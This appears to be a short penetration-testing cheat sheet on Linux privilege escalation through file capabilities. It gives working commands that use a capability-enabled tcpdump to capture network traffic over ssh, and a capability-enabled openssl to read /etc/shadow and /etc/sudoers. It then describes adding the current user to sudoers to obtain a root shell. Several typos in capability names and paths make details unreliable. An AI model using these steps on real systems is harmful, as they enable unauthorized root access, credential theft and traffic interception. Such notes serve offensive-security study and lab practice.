if you see ep in the capabilities, this is usually the priv esc path!!

Example. POSIX cababilities set:

/usr/sbin/tcpdump = cap_net_admin,cat_net_raw+ep 
  • it lets us run the tcp packets as root.

Example Exploitation:

ssh user@IP "tcpdump -i interface -U -s0 -w - 'not port 22'" | wireshark -k -i -  
  • last hyphen standard out

  • you may need to use the full path like "/user/sbin/tcpdump" (which tcpdump to see the path)

  • try different interfaces if available i,e) -i io

  • try do something to interact with the server (like visiting different web pages if it's running HTTP) / ping the localhost within ssh session

ep only

if the capabilities show command=ep then we have all permissions on the particular command

i.e) openssl=ep

this means, we can execute the command with all kinds of permissions except for Sudo.

Go to the GTFO bins and see what we have. File read for root files are possible /etc/shadow

./openssl enc -in /etc/shadow (if the openssl is in the bin(which openssl) , otherwise run it normal) 
./openssl enc -in /etc/sudoers > sudoers 
edit the sudoers file and add a permission for the current user (ALL=(ALL) ALL
  • ./ will let you run the command within the home directory where the capabilities apply.

Now you can do sudo bash!

Last updated